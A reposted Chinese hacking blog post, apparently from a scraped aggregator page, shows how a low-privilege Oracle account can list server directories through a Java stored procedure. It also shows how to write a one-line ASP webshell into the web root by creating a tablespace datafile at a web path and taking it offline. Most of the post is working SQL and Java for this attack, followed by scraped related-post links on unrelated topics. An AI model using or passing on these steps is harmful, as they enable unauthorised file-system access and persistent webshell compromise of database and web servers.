linux得到低权shell,oracle低权限下获取shell
转载请标明:http://hi.baidu.com/hack_forensic 《关于oracle列目录的可行性测试》
经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj021320在文章<>最后说,当然这个方法缺点就是你要知道WEB路径.少费话,直接贴code:
create global temporary table BLUEUSER.dirlist(
filename varchar2(255),
filesize number,
filedate date)
on commit delete rows;
/
create or replace and compile java source named DirList as
import java.io.*;
import java.sql.*;
public class DirList
{
public static void getList(String directory) throws SQLException
{
File path=new File(directory);
String[] fileList=path.list();
String fileName;
long fileSize;
long fileDate;
for (int i=0;i
{
fileName=fileList[i];
File fpath=new File(directory+’/'+fileName);
fileSize=fpath.length();
fileDate=fpath.lastModified();
#sql{insert into BLUEUSER.dirlist(filename, filesize, filedate)
values(:fileName,:fileSize,to_date(’01/01/1970′,’mm/dd/yyyy’)+:fileDate/(24*60*60*1000))};
}
}
}
CREATE OR REPLACE PROCEDURE BLUEUSER.p_get_dir_list(i_directory IN VARCHAR2) AS
LANGUAGE JAVA NAME ‘DirList.getList(java.lang.String)’;
SQL> exec BLUEUSER.p_get_dir_list(‘/tmp’);
PL/SQL procedure successfully completed
select * from BLUEUSER.dirlist;
select * from BLUEUSER.dirlist where rownum<150;
select filename from BLUEUSER.dirlist where rownum<150;
select filename from BLUEUSER.dirlist;
truncate table BLUEUSER.dirlist; 好啊 要不然是追加.
测试环境:oracle 9+redhat
——————ORACLE 建立数据文件WriteWebShell———————
SQLJ 存储过程写文件也可以,逼于无奈对方机器不支持SQLJ 还有 UTL_FILE包也被干掉了?
那 也可以 使用以下我说的这个方式
SQL> create tablespace kjtest datafile ‘e:\website\kj.asp’ size 100k nologging ;
表空间已创建。
这里记住了 100K为ORACLE 表空间最小的单位,如果你的一句话SHELL比较大 那可以200K比较稳妥
但是最终建议一句话一定要最最简洁
SQL> CREATE TABLE WEBSHELL(C varchar2(100)) tablespace kjtest;
表已创建。
一般用 VARCHAR类型已经可以 ,表空间太小了 ,所以不可以 为 CLOB或者 BLOB类型。
SQL> insert into WEBSHELL values(‘’);
已创建 1 行。
SQL> commit;
提交完成。
提交完成之后就 OK? NO~ 因为数据还没有被 DBWn 进程刷到文件呢. 所以需要同步一下CKPT以及OFFLINE当前表空间
SQL> alter tablespace kjtest offline;
表空间已更改。
到这里 你的 一句话SHELL代码已经 写到 那个文件了
你会发现有这样的 的 代码
一句话shell已经OK了
最后使用后记得吧 表空间删除
SQL> drop tablespace kjtest including contents;
表空间已删除。
linux得到低权shell,oracle低权限下获取shell相关推荐
- oracle低权限下获取shell
转载请标明:http://hi.baidu.com/hack_forensic <关于oracle列目录的可行性测试> 经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj ...
- oracle 最小权限,oracle低权限下获取shell
转载请标明:http://hi.baidu.com/hack_forensic <关于oracle列目录的可行性测试> 经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj ...
- javaweb系统oracle锁表,oracle、websphere下获取数据库连接时出现死锁
环境 windows 2003 server websphere 7. druid 0.2.9 oracle 11 druid参数 initialSize=60 maxActive= 200 异常 [ ...
- 【Shell】在windows下编辑shell脚本
注意事项: 1.第一行:#!/bin/bash 2.Notepad++编辑器:将文档格式转换为unix
- shell脚本系列:1、shell、bash和shell脚本
shell脚本系列:1.shell.bash和shell脚本 文章目录 shell脚本系列:1.shell.bash和shell脚本 1. 前言 2. shell.Bash.shell script简 ...
- 获取Shell(提权)后的操作(windows、Linux)
对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同. Windows 当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作 ...
- Linux shell初识及权限理解
shell初识 Linux严格意义上说的是一个操作系统,我们称之为"核心(kernel)" ,但我们一般用户,不能直接使用kernel. 而是通过kernel的"壳&qu ...
- linux初始:命令行解释器(shell)、权限
目录 命令行解释器 什么是命令行解释器(shell) 命令行解释器的作用 权限 权限的种类 结合用户去理解权限 如何查看权限 用户和用户组 如何看懂权限 如何更改权限 权限对于文件或文件夹的影响 权限 ...
- linux脚本赋权命令765,Linux权限命令chmod
一.Linux chmod命令修改文件和文件目录权限(默认情况下只有root用户才能使用).命令格式:chmod+修改内容+要修改的文件或者 目录 或者 chmod -R 修改内容 要修改的文件或者 ...
最新文章
- “抗疫”的第二战线:有人整晚睡不着,有人远程提供紧急心理包扎
- 看到好东西, 赶紧收藏一下
- 数据库被挂马的ASP处理方法
- 全选反选JavaScript实现
- 调节pycharm字体大_字体美化大师里的字体推荐
- 计算机基础应用网络统考题库,2016年9月网络教育《计算机应用基础》统考模拟试题及答案 (1)...
- 【渝粤教育】国家开放大学2018年春季 7396-21T法学基础知识 参考试题
- winform通过WebClient调用api接口
- HTML+CSS大作业 (水果之家10个网页)
- python作诗_用Python作诗,生活仍有诗和远方
- 关于windows版本电脑版微信更新后无法显示好友头像以及接收图片和表情的解决方案
- OpenGL编程(四)改变窗口大小时保持图形的原形
- 九月腾讯,创新工场,淘宝等公司最新面试三十题
- VTN系列多通道振弦、温度、模拟传感信号系列数据采集仪
- 信道容量、码率、带宽、频谱利用率
- 48万奖金等你瓜分! 2019华为开发者大赛全栈开放!
- 关于Mac 连接校园网Wi-Fi出现“此连接非私人连接”,点击“访问网站”后出现乱码解决办法
- Java对Json的一系列操作(构建、json与对象的转换)
- springboot整合佳博打印机打印条码、二维码
- 我的DW个人网站设计——安徽宣城6页HTML+CSS+JavaScript
热门文章
- extjs chart无法在panel中显示_HighChart教程:Swift中的Highcharts iOS库
- 面试官:什么是 Reactor 和 Proactor
- 【Elasticsearch】关于 Analyzers 的一切,第一部分
- 【lucene】lucene自定义评分
- 90-30-020-源码-任务调度-Kylin任务调度
- 【kafka】kafka consumer offset lag获取的三者方式
- Spring Boot 集成 Quartz
- linux中查看某个进程打开的文件数
- yarn:hadoop YarnChild OutOfMemoryError Java heap space || GC Overhead limit
- 【安全】Docker安装LDAP